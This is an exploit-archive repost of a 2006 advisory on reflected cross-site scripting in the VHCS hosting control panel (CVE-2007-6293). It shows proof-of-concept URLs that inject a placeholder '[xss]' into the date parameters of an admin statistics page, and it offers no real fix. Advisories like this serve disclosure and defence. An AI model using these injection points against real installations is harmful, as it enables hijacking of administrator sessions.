Advertisement






VHCS --- Virtual Hosting Control System Cross Site Scripting

CVE Category Price Severity
CVE-2007-6293 CWE-79 $500 High
Author Risk Exploitation Type Date
unknown High Remote 2006-05-12
CPE
cpe:cpe:/a:vhcs:virtual_hosting_control_system
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006050029

Below is a copy:

#----------------------------------------------------------

#Aria-Security.net Advisory

#Discovered  by: O.U.T.L.A.W

#< www.Aria-security.net>

#Gr33t to: A.u.r.a  & R@1D3N & Smok3r

#-----------------------------------------------------------

Software: VHCS

Link: http://www.vhcs.net

Attack method: Cross Site Scripting

advisory:http://www.aria-security.net/hm/vhcs.txt

Summary:

vhcs is a powerfull Hosting Managment

Proof of Concept:

Admin Require

[target]/admin/server_day_stats.php?year=2006&month=05&day=2[xss]

[target]/admin/server_day_stats.php?year=2006&month=05[xss]&day=2

[target]/admin/server_day_stats.php?year=2006[xss]&month=05&day=2

Solution

contact me: Advisory (at) Aria-Security (dot) net [email concealed]

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.